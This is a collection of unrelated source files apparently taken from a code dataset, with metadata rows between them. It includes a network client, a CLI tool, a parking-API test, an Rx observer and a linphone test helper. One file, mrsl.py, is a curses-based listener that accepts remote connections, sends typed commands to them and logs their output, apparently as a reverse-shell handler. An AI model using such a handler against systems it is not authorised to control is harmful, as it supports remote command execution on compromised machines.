# dice_operation = random.choice(DICE_OPERATION)
# number_of_tiles = random.choice(NUMBER_OF_TILES)
# create_json = [{
# "dice_operation": dice_operation,
# "number_of_tiles": number_of_tiles,
# "username": user["username"]}]
# outside_request = outside_requests.post(
# url=new_game_url, params=create_json[0])
# raw_urlsafe_key = outside_request.json()["urlsafe_key"]
# game_entity = get_by_urlsafe(raw_urlsafe_key, Game)
# turn_list = random.choice(turns.get(
# dice_operation + number_of_tiles))
# for turn in turn_list.get("turn_list"):
# new_turn = Turn(
# key=Turn.create_turn_key(game_entity.key),
# active_tiles=turn.get("active_tiles"),
# roll=turn.get("roll"),
# turn=turn.get("turn"))
# if turn.get("turn_over"):
# new_turn.turn_over = turn.get("turn_over")
# if turn.get("game_over"):
# new_turn.game_over = turn.get("game_over")
# new_turn.put()
# final_score = turn_list.get("final_score")
# if final_score is not None:
# game_entity.final_score = final_score
# game_entity.game_over = True
# game_entity.put()
# return InsertOrDeleteDataResultForm(message="Data added "\
# "successfully!")
| mit | 5,379,919,921,991,045,000 | 44.5932 | 95 | 0.60847 | false | 4.287872 | false | false | false |
netrack/python-netrackclient | netrackclient/netrack/v1/network.py | 1 | 2752 | from netrackclient import errors
from netrackclient.netrack.v1 import constants
import collections
import ipaddress
_Network = collections.namedtuple("Network", [
"encapsulation",
"address",
"interface",
"interface_name",
])
class Network(_Network):
def __new__(cls, **kwargs):
kwargs = dict((k, kwargs.get(k)) for k in _Network._fields)
return super(Network, cls).__new__(cls, **kwargs)
class NetworkManager(object):
def __init__(self, client):
super(NetworkManager, self).__init__()
self.client = client
def _url(self, datapath, interface):
url = "{url_prefix}/datapaths/{datapath}/network/interfaces/{interface}"
return url.format(url_prefix=constants.URL_PREFIX,
datapath=datapath,
interface=interface)
def _encapsulation(self, address):
#TODO: add support of other protocols
network = ipaddress.ip_interface(address)
return "ipv{0}".format(network.version)
def update(self, datapath, interface, network):
url = self._url(datapath, interface)
# parse address to configure encapsulation
encapsulation = self._encapsulation(network.address)
try:
self.client.put(url, body=dict(
encapsulation=encapsulation,
address=network.address,
))
except errors.BaseError as e:
raise errors.NetworkError(*e.args)
def get(self, datapath, interface):
try:
response = self.client.get(self._url(
datapath=datapath,
interface=interface,
))
except errors.BaseError as e:
raise errors.NetworkError(*e.args)
return Network(**response.body())
def list(self, datapath):
url = "{url_prefix}/datapaths/{datapath}/network/interfaces"
url = url.format(url_prefix=constants.URL_PREFIX,
datapath=datapath)
try:
response = self.client.get(url)
        except errors.BaseError as e:
raise errors.NetworkError(*e.args)
interfaces = []
for interface in response.body():
interfaces.append(Network(**interface))
return interfaces
def delete(self, datapath, interface, network):
url = self._url(datapath, interface)
# parse address to configure encapsulation
encapsulation = self._encapsulation(network.address)
try:
self.client.delete(url, body=dict(
encapsulation=encapsulation,
address=network.address,
))
except errors.BaseError as e:
raise errors.NetworkError(*e.args)
| lgpl-3.0 | -8,860,857,873,628,524,000 | 28.591398 | 80 | 0.597747 | false | 4.467532 | false | false | false |
boundary/pulse-api-cli | boundary/event_get.py | 4 | 1613 | #
# Copyright 2015 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from boundary import ApiCli
import requests
import json
class EventGet(ApiCli):
def __init__(self):
ApiCli.__init__(self)
self.event_id = None
def add_arguments(self):
ApiCli.add_arguments(self)
self.parser.add_argument('-i', '--event-id', dest='event_id', action='store', required=True,
metavar='event_id', help='Event id of the event to fetch')
def get_arguments(self):
if self.args.event_id is not None:
self.event_id = self.args.event_id
self.path = "v1/events/{0}".format(self.event_id)
def get_description(self):
return "Gets a single event by id from a {0} account".format(self.product_name)
def _handle_results(self):
# Only process if we get HTTP result of 200
if self._api_result.status_code == requests.codes.ok:
out = json.dumps(json.loads(self._api_result.text), sort_keys=True, indent=4, separators=(',', ': '))
print(self.colorize_json(out))
| apache-2.0 | -2,112,440,596,593,151,700 | 34.065217 | 113 | 0.66088 | false | 3.786385 | false | false | false |
Tisseo/navitia | source/jormungandr/jormungandr/parking_space_availability/car/tests/star_test.py | 2 | 4311 | # encoding: utf-8
# Copyright (c) 2001-2014, Canal TP and/or its affiliates. All rights reserved.
#
# This file is part of Navitia,
# the software to build cool stuff with public transport.
#
# Hope you'll enjoy and contribute to this project,
# powered by Canal TP (www.canaltp.fr).
# Help us simplify mobility and open public transport:
# a non ending quest to the responsive locomotion way of traveling!
#
# LICENCE: This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Stay tuned using
# twitter @navitia
# IRC #navitia on freenode
# https://groups.google.com/d/forum/navitia
# www.navitia.io
from __future__ import absolute_import, print_function, unicode_literals, division
import pytest
from mock import MagicMock
from jormungandr.parking_space_availability.car.star import StarProvider
from jormungandr.parking_space_availability.car.parking_places import ParkingPlaces
poi = {
'properties': {
'operator': 'Keolis Rennes',
'ref': '42'
},
'poi_type': {
'name': 'parking relais',
'id': 'poi_type:amenity:parking'
}
}
def car_park_space_availability_start_support_poi_test():
"""
STAR car provider support
"""
provider = StarProvider("fake.url", {'Keolis Rennes'}, 'toto', 42)
assert provider.support_poi(poi)
def car_park_space_get_information_test():
parking_places = ParkingPlaces(available=4,
occupied=3,
available_PRM=2,
occupied_PRM=0)
provider = StarProvider("fake.url", {'Keolis Rennes'}, 'toto', 42)
star_response = """
{
"records":[
{
"fields": {
"nombreplacesdisponibles": 4,
"nombreplacesoccupees": 3,
"nombreplacesdisponiblespmr": 2,
"nombreplacesoccupeespmr": 0
}
}
]
}
"""
import json
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
assert provider.get_informations(poi) == parking_places
invalid_poi = {}
assert provider.get_informations(invalid_poi) is None
provider._call_webservice = MagicMock(return_value=None)
assert provider.get_informations(poi) is None
star_response = """
{
"records":[
{
"fields": {
}
}
]
}
"""
empty_parking = ParkingPlaces(available=None,
occupied=None,
available_PRM=None,
occupied_PRM=None)
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
assert provider.get_informations(poi) == empty_parking
star_response = """
{
"records":[
]
}
"""
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
assert provider.get_informations(poi) == empty_parking
    # Case where the PRM information is not provided
parking_places = ParkingPlaces(available=4,
occupied=3)
    provider = StarProvider("fake.url", {'Keolis Rennes'}, 'toto', 42)
star_response = """
{
"records":[
{
"fields": {
"nombreplacesdisponibles": 4,
"nombreplacesoccupees": 3
}
}
]
}
"""
provider._call_webservice = MagicMock(return_value=json.loads(star_response))
info = provider.get_informations(poi)
assert info == parking_places
assert not hasattr(info, "available_PRM")
assert not hasattr(info, "occupied_PRM")
| agpl-3.0 | 186,277,712,400,421,250 | 31.413534 | 83 | 0.60334 | false | 3.794894 | false | false | false |
ampyche/ampyche | setup/crap/createdb.py | 1 | 2330 | #!/usr/bin/env python
import os, time
import sqlite3 as lite
import populatedb as pdb
class AmpycheApp():
def __init__(self):
ANSN = ('N', 'n', 'No', 'no')
ANSY = ('Y', 'y', 'Yes', 'yes')
self.ANSN = ANSN
self.ANSY = ANSY
self.pdb = pdb
def _get_selection(self):
print("""
\nWelcome to Ampyche. Please select the appropriate action.
1. Setup Ampyche.
2. Rescan/Add new music.
3. Setup Ampyche using an already existing
Ampache mysql database.
""")
selection = input("---> ")
return selection
def _get_music_path(self):
print("""
\nPlease enter the path to where the music files reside.
For example: /home/music: """)
m_path = input("---> ")
m_path = str(m_path)
return m_path
def _select_one(self, a_path):
gettags = pdb.Ampyche()
gettags = gettags.run(a_path)
def _select_two(self):
print("selection two")
#update = self.upd.UpdateDb()
#update = update._update()
##############################################################
## Start of MySQL stuff
def _get_hostname(self):
print("""
Please enter the Hostname of the MySql Database. """)
response = input("---> ")
return response
def _get_username(self):
print("""
Please enter the MySql Database Username. """)
response = input("---> ")
return response
def _get_password(self):
print("""
Please enter the MySql Database Password. """)
response = input("---> ")
#need to validate for letters and numbers only
return response
def _get_dbname(self):
print("""
Please enter the MySql Database Name. """)
response = input("---> ")
#need to validate for letters and numbers only
return response
def _select_three(self, ):
print("selection three")
# hostname = self._get_hostname()
# username = self._get_username()
# password = self._get_password()
# dbname = self._get_dbname()
#make db connection and generate static files.
#do more stuff here
def main(self):
selection = self._get_selection()
music_path = self._get_music_path()
if selection == '1':
make_it_so = self._select_one(music_path)
print("selection 1 complete")
if selection == '2':
make_it_so2 = self._select_two()
print("selection 2 complete")
if selection == '3':
print("this is selection three")
if __name__ == "__main__":
app = AmpycheApp()
app = app.main() | mit | 4,055,968,117,639,858,700 | 22.545455 | 62 | 0.624034 | false | 3.119143 | false | false | false |
wangmengcn/BeautifulPics | wallpaper.py | 1 | 4351 | # -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import time
from sets import Set
import re
import os
import cookielib
# Build the request headers
agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36'
refer = 'http://interfacelift.com//wallpaper/7yz4ma1/04020_jetincarina_1440x900.jpg'
accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
uir = '1'
host = 'interfacelift.com'
connection = 'keep-alive'
pragma = 'no-cache'
acencode = 'gzip, deflate, sdch'
acln = 'en,zh-CN;q=0.8,zh;q=0.6'
headers = {
'User-Agent': agent
#'Referer':refer
}
# Use a session to carry login cookie information across requests
session = requests.session()
def get_tags():
url = "https://interfacelift.com/wallpaper/tags/"
baseurl = "https://interfacelift.com"
tags = session.get(url).text.encode('utf-8')
tagsoup = BeautifulSoup(tags, 'html5lib')
cloud = tagsoup.select('.cloud', _candidate_generator=None, limit=None)
for item in cloud:
try:
links = item.select('a')
print len(links)
floder = 0
for link in links:
try:
taglink = link['href']
taglink = baseurl + taglink
tagname = link.next_element.encode('utf-8')
filepath = os.getcwd() + '/wallpaper/' + str(floder)
print taglink
print filepath
print os.path.exists(filepath)
if not os.path.exists(filepath):
os.mkdir(filepath)
floder += 1
linkend = 1
picinit = taglink + "index" + str(linkend) + ".html"
while download(picinit, filepath):
linkend += 1
picinit = taglink + "index" + \
str(linkend) + ".html"
else:
floder += 1
continue
except:
floder += 1
print "下载出错"
except Exception, e:
print "出错了"
def download(picurl, path):
delchar = ['%2C', '%27']
if picurl:
unique = Set()
picpage = session.get(picurl).text
picsoup = BeautifulSoup(picpage.encode('utf-8'), 'html5lib')
divsoup = picsoup.select('a[href^="/wallpaper/details"]')
if divsoup:
try:
split = 0
for li in divsoup:
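                    # Keep only every 4th anchor: the page appears to repeat
                    # the same details link several times per wallpaper
                    # (assumption inferred from the modulo-4 stride below).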
if split % 4 == 0:
baseurl = li['href'].split('/', -1)
id = int(baseurl[3])
subbase = baseurl[4].split('.', -1)
cleanbase = subbase[0].replace('_', '')
if '%2C' in cleanbase or '%27' in cleanbase:
cleanbase = cleanbase.replace('%2C', '')
cleanbase = cleanbase.replace('%27', '')
downloadurl = get_picurl(cleanbase, id, foo='1440x900')
print downloadurl, "--->", path
print cleanbase
get_file(downloadurl, cleanbase, path)
split += 1
return True
except:
print "获取链接失败"
return False
else:
return False
else:
return False
def get_picurl(base=None, id=None, foo='1440x900'):
baseurl = "http://interfacelift.com"
if base and id:
suburl = "/wallpaper/7yz4ma1/" + \
str(id) + '_' + base + '_' + foo + '.jpg'
picurl = baseurl + suburl
return picurl
def get_file(url, filename, path):
if url:
r = session.get(url, headers=headers)
# print r.text.encode('utf-8')
print filename
picname = path + "/" + filename + '.jpg'
with open(picname, 'wb') as f:
f.write(r.content)
            print picname, "download finished"
# f.close()
time.sleep(3)
# get_tags()
# get_file("http://interfacelift.com/wallpaper/7yz4ma1/01178_chicagoatnight_1440x900.jpg",'adas','.')
def test():
get_tags()
test()
| mit | 9,067,254,202,223,429,000 | 31.097015 | 130 | 0.492444 | false | 3.753054 | false | false | false |
buildingenergy/buildingenergy-platform | landing/migrations/0003_auto__add_field_seeduser_default_organization.py | 1 | 5820 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'SEEDUser.default_organization'
db.add_column(u'landing_seeduser', 'default_organization',
self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='default_users', null=True, to=orm['orgs.Organization']),
keep_default=False)
def backwards(self, orm):
# Deleting field 'SEEDUser.default_organization'
db.delete_column(u'landing_seeduser', 'default_organization_id')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'landing.seeduser': {
'Meta': {'object_name': 'SEEDUser'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_custom_columns': ('djorm_pgjson.fields.JSONField', [], {'default': '{}'}),
'default_organization': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'default_users'", 'null': 'True', 'to': u"orm['orgs.Organization']"}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'show_shared_buildings': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '75'})
},
u'orgs.organization': {
'Meta': {'ordering': "['name']", 'object_name': 'Organization'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'parent_org': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_orgs'", 'null': 'True', 'to': u"orm['orgs.Organization']"}),
'query_threshold': ('django.db.models.fields.IntegerField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'orgs'", 'symmetrical': 'False', 'through': u"orm['orgs.OrganizationUser']", 'to': u"orm['landing.SEEDUser']"})
},
u'orgs.organizationuser': {
'Meta': {'ordering': "['organization', '-role_level']", 'object_name': 'OrganizationUser'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['orgs.Organization']"}),
'role_level': ('django.db.models.fields.IntegerField', [], {'default': '20'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'pending'", 'max_length': '12'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['landing.SEEDUser']"})
}
}
complete_apps = ['landing'] | apache-2.0 | 187,370,825,201,765,600 | 71.7625 | 206 | 0.571134 | false | 3.709369 | false | false | false |
pauljohnleonard/pod-world | Segway/rungekutta.py | 1 | 2537 |
"""
DO NOT MODIFY
Time steps a system using Runge-Kutta 4th order numerical integration
Uses a time step of h
"""
import numpy
class RungeKutta:
def __init__(self, state,time, h,model):
"""
Initialise simulation
state -- starting state
time -- time
h -- runga kutta time step
model -- physical model
"""
self.n = len(state)
self.time=time;
self.h=h;
self.model=model;
self.state=state;
self.init()
def init(self):
self.state_dot1 = numpy.zeros(self.n)
self.state_dot2 = numpy.zeros(self.n)
self.state_dot3 = numpy.zeros(self.n)
self.state_dot4 = numpy.zeros(self.n)
self.state1 = numpy.zeros(self.n)
self.state2 = numpy.zeros(self.n)
self.state3 = numpy.zeros(self.n)
def stepRK(self):
"""
        Perform one Runge-Kutta time step
"""
        # 1. derivative estimate (k1) at the start of the step
tstart = self.time
self.model._eval(tstart, self.state, self.state_dot1)
        # 2. derivative estimate (k2) at time + h/2 using the k1 estimate
tmid = self.time + self.h/ 2.0
for i in xrange(self.n):
self.state1[i] = self.state[i] + self.h * self.state_dot1[i] * 0.5
self.model._eval(tmid, self.state1, self.state_dot2)
        # 3. derivative estimate (k3) at time + h/2 using the k2 estimate
        for i in xrange(self.n):
            self.state2[i] = self.state[i] + self.h * self.state_dot2[i] * 0.5
        self.model._eval(tmid, self.state2, self.state_dot3)
        # 4. derivative estimate (k4) at the end of the full step
        tend = self.time + self.h
        for i in xrange(self.n):
            self.state3[i] = self.state[i] + self.h * self.state_dot3[i]
self.model._eval(tend, self.state3, self.state_dot4)
for i in xrange(self.n):
self.state[i] += self.h * (self.state_dot1[i] + 2.0 * self.state_dot2[i] + 2.0 * self.state_dot3[i] + self.state_dot4[i])/ 6.0
self.time +=self.h
def reset(self):
"""
Reset the model
"""
self.time=0.0
self.model.reset()
self.init()
def step(self,dt):
"""
        Perform Runge-Kutta time steps to advance the model by dt
"""
tend=self.time+dt
while(self.time < tend):
self.stepRK()
self.model.time=self.time
| gpl-2.0 | 7,965,845,920,631,956,000 | 26 | 138 | 0.528183 | false | 3.342556 | false | false | false |
infinity0n3/python-fabtotum | fabtotum/loaders/gerber/excellon_settings.py | 2 | 2928 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2015 Garret Fick <[email protected]>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Excellon Settings Definition File module
====================
**Excellon file classes**
This module provides Excellon file classes and parsing utilities
"""
import re
try:
from cStringIO import StringIO
except(ImportError):
from io import StringIO
from .cam import FileSettings
def loads(data):
""" Read settings file information and return an FileSettings
Parameters
----------
data : string
string containing Excellon settings file contents
Returns
-------
file settings: FileSettings
"""
return ExcellonSettingsParser().parse_raw(data)
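# Illustrative call, using the four keys handled in SETTINGS_KEYS below:
#
#     settings = loads("INTEGER-PLACES 2\n"
#                      "DECIMAL-PLACES 4\n"
#                      "COORDINATES ABSOLUTE\n"
#                      "OUTPUT-UNITS ENGLISH\n")
#     # -> settings.format == (2, 4), settings.notation == 'absolute',
#     #    settings.units == 'inch'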
def map_coordinates(value):
if value == 'ABSOLUTE':
return 'absolute'
return 'relative'
def map_units(value):
if value == 'ENGLISH':
return 'inch'
return 'metric'
def map_boolean(value):
return value == 'YES'
SETTINGS_KEYS = {
'INTEGER-PLACES': (int, 'format-int'),
'DECIMAL-PLACES': (int, 'format-dec'),
'COORDINATES': (map_coordinates, 'notation'),
'OUTPUT-UNITS': (map_units, 'units'),
}
class ExcellonSettingsParser(object):
"""Excellon Settings PARSER
Parameters
----------
None
"""
def __init__(self):
self.values = {}
self.settings = None
def parse_raw(self, data):
for line in StringIO(data):
self._parse(line.strip())
# Create the FileSettings object
self.settings = FileSettings(
notation=self.values['notation'],
units=self.values['units'],
format=(self.values['format-int'], self.values['format-dec'])
)
return self.settings
def _parse(self, line):
line_items = line.split()
if len(line_items) == 2:
item_type_info = SETTINGS_KEYS.get(line_items[0])
if item_type_info:
# Convert the value to the expected type
item_value = item_type_info[0](line_items[1])
self.values[item_type_info[1]] = item_value | gpl-3.0 | 3,470,824,948,019,611,600 | 26.895238 | 98 | 0.582309 | false | 4.350669 | false | false | false |
ShawnCorey/mrsl | mrsl.py | 1 | 5339 | import socket, threading, traceback
import curses
import curses.textpad
import datetime
from time import sleep
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-p','--port', default=80, type=int, help='Port number to listen on (default is 80)')
args = parser.parse_args()
PORT = args.port
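# Usage sketch: run e.g. `python mrsl.py -p 4444`, then point connect-back
# shells at this port (assumption -- any reverse shell works, for instance
# `bash -i >& /dev/tcp/<listener-ip>/4444 0>&1` from the remote host).
# Key bindings handled in gui.draw_ui below: Tab cycles through connected
# clients, Enter sends the typed command to the active client, F10 closes
# the active client, F12 exits the program.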
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', PORT))
s.listen(4)
clients = [] #list of clients connected
lock = threading.Lock()
exitScript = False
class gui(threading.Thread):
def run(self):
curses.wrapper(self.draw_ui)
def draw_ui(self, stdscr):
global clients
global exitScript
height, width = stdscr.getmaxyx()
clientWin = stdscr.subwin(height-3, 17, 0, 0)
clientWin.scrollok(True)
bufferWin = stdscr.subwin(height-3, width-18,0, 18)
bufferWin.scrollok(True)
inputWin = stdscr.subwin(2, width-1,height-3, 0)
inputWin.scrollok(True)
tb = curses.textpad.Textbox(inputWin)
stdscr.nodelay(1)
k = 0
sendCommand = False
closeActive = False
oldHeight = 0
oldWidth = 0
while k != 276: #276 is keycode for F12
clientWin.clear()
if len(clients) == 0:
bufferWin.clear()
bufferWin.refresh()
height, width = stdscr.getmaxyx()
if oldHeight != height or oldWidth != width:
clientWin.resize(height-3, 17)
bufferWin.resize(height-3, width-18)
inputWin.resize(2, width-1)
if k == 9: # 9 is keycode for tab
for idx in range(0,len(clients)):
if clients[idx].active:
clients[idx].active = False
if idx >= len(clients)-1:
newIdx = 0
else:
newIdx = idx+1
clients[newIdx].active = True
clients[newIdx].updated = True
break
elif k == 10:# 10 is keycode for enter
sendCommand = True
elif k == 274:# 274 is keycode for F10
closeActive = True
elif k != 0:
tb.do_command(k)
lineNum = 0
for conn in clients:
if conn.active:
if sendCommand:
conn.command = tb.gather()
sendCommand = False
inputWin.clear()
if closeActive:
conn.toClose = True
closeActive = False
clientWin.addstr(lineNum,0,"*"+conn.r_ip+"\n")
#Update buffer display to show updated log buffer
if conn.updated:
bufferWin.clear()
bufferWin.addstr(0,0,conn.buffer)
bufferWin.refresh()
conn.updated = False
else:
clientWin.addstr(lineNum,0," "+conn.r_ip+"\n")
lineNum+=1
clientWin.refresh()
inputWin.refresh()
k = 0
try:
k = stdscr.getch()
except:
pass
#sleep(0.1)
exitScript = True
class remoteConn(threading.Thread):
active = False
toClose = False
updated = False
buffer = ""
command = ""
def __init__(self, sock):
threading.Thread.__init__(self)
socket, address = sock
self.socket = socket
self.r_ip, self.r_port = address
logname = self.r_ip+"--"+datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S-%f")+".log"
self.logfile = open(logname, "ab", 0)
def updateBuffer(self, data):
self.buffer += data.decode("utf-8")
self.logfile.write(data)
self.updated = True
def run(self):
global clients
global exitScript
global lock
lock.acquire()
clients.append(self)
if len(clients) == 1:
self.active = True
lock.release()
self.socket.settimeout(1)
while exitScript == False and self.toClose == False:
try:
data = self.socket.recv(1024)
if not data:
break
self.updateBuffer(data)
except Exception as e:
pass
if self.command != "":
self.socket.send(bytearray(self.command, "utf-8"))
self.updateBuffer(bytearray(self.command, "utf-8"))
self.command = ""
self.socket.close()
lock.acquire()
clients.remove(self)
if self.active and len(clients) >= 1:
clients[0].active = True
clients[0].updated = True
lock.release()
self.logfile.close()
threads = []
while exitScript == False: # wait for socket to connect
    ui = gui()
    ui.start()
    threads.append(ui)  # keep the Thread object; start() returns None
s.settimeout(1)
while exitScript == False:
try:
            conn = remoteConn(s.accept())
            conn.start()
            threads.append(conn)  # keep the Thread object; start() returns None
except:
pass
for t in threads:
try:
t.join()
except:
pass
print("exiting")
| lgpl-3.0 | -6,856,561,642,211,354,000 | 30.591716 | 105 | 0.505338 | false | 4.237302 | false | false | false |
ChemiKhazi/Sprytile | rx/joins/joinobserver.py | 2 | 1443 | from rx.core import ObserverBase
from rx.disposables import SingleAssignmentDisposable
class JoinObserver(ObserverBase):
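    # One JoinObserver wraps one source observable for the Rx join/when
    # machinery: the source is materialized (see subscribe below), every
    # notification is queued here, and each active plan is asked to re-check
    # its queues for a match.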
def __init__(self, source, on_error):
super(JoinObserver, self).__init__()
self.source = source
self.on_error = on_error
self.queue = []
self.active_plans = []
self.subscription = SingleAssignmentDisposable()
self.is_disposed = False
def _on_next_core(self, notification):
if not self.is_disposed:
if notification.kind == 'E':
self.on_error(notification.exception)
return
self.queue.append(notification)
active_plans = self.active_plans[:]
for plan in active_plans:
plan.match()
def _on_error_core(self, error):
return NotImplemented
def _on_completed_core(self):
return NotImplemented
def add_active_plan(self, active_plan):
self.active_plans.append(active_plan)
def subscribe(self):
self.subscription.disposable = self.source.materialize().subscribe(self)
def remove_active_plan(self, active_plan):
self.active_plans.remove(active_plan)
if not len(self.active_plans):
self.dispose()
def dispose(self):
super(JoinObserver, self).dispose()
if not self.is_disposed:
self.is_disposed = True
self.subscription.dispose()
| mit | 9,076,241,135,832,228,000 | 27.86 | 80 | 0.61192 | false | 4.030726 | false | false | false |
zhuolinho/linphone | submodules/linphone/tools/python/unittests/linphonetester.py | 8 | 32028 | from datetime import timedelta, datetime
from nose.tools import assert_equals
from copy import deepcopy
import linphone
import logging
import os
import sys
import time
import weakref
test_domain = "sipopen.example.org"
auth_domain = "sip.example.org"
test_username = "liblinphone_tester"
test_password = "secret"
test_route = "sip2.linphone.org"
if os.path.isdir(os.path.join(os.path.dirname(__file__), "rcfiles")):
# Running unit tests from an installed package
tester_resources_path = os.path.abspath(os.path.dirname(__file__))
else:
# Running unit tests from the linphone sources
tester_resources_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../../tester/"))
def linphonetester_log_handler(level, msg):
import logging
method = getattr(logging.getLogger("linphonetester"), level)
if not msg.strip().startswith('[PYLINPHONE]'):
msg = '[CORE] ' + msg
method(msg)
linphonetester_logger = logging.getLogger("linphonetester")
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s.%(msecs)03d %(levelname)s: %(message)s', '%H:%M:%S')
handler.setFormatter(formatter)
linphonetester_logger.addHandler(handler)
linphone.set_log_handler(linphonetester_log_handler)
def create_address(domain):
addr = linphone.Address.new(None)
assert addr != None
addr.username = test_username
assert_equals(addr.username, test_username)
if domain is None:
domain = test_route
addr.domain = domain
assert_equals(addr.domain, domain)
addr.display_name = None
addr.display_name = "Mr Tester"
assert_equals(addr.display_name, "Mr Tester")
return addr
class Account:
def __init__(self, id_addr, unique_id):
self.created = False
self.done = False
self.auth_requested = False
self.identity = id_addr.clone()
self.password = linphone.testing.get_random_token(8)
self.modified_identity = id_addr.clone()
modified_username = "{username}_{unique_id}".format(username=id_addr.username, unique_id=unique_id)
self.modified_identity.username = modified_username
class AccountManager:
def __init__(self):
self.unique_id = linphone.testing.get_random_token(6)
self.accounts = []
@classmethod
def wait_for_until(cls, lc1, lc2, func, timeout):
lcs = []
if lc1 is not None:
lcs.append(lc1)
if lc2 is not None:
lcs.append(lc2)
return cls.wait_for_list(lcs, func, timeout)
@classmethod
def wait_for_list(cls, lcs, func, timeout):
start = datetime.now()
end = start + timedelta(milliseconds = timeout)
res = func(*lcs)
while not res and datetime.now() < end:
for lc in lcs:
lc.iterate()
time.sleep(0.02)
res = func(*lcs)
return res
@classmethod
def account_created_on_server_cb(cls, lc, cfg, state, message):
if state == linphone.RegistrationState.Ok:
lc.user_data().created = True
elif state == linphone.RegistrationState.Cleared:
lc.user_data().done = True
@classmethod
def account_created_auth_requested_cb(cls, lc, realm, username, domain):
lc.user_data().auth_requested = True
def check_account(self, cfg):
create_account = False
lc = cfg.core
id_addr = cfg.identity_address
account = self._get_account(id_addr)
if account is None:
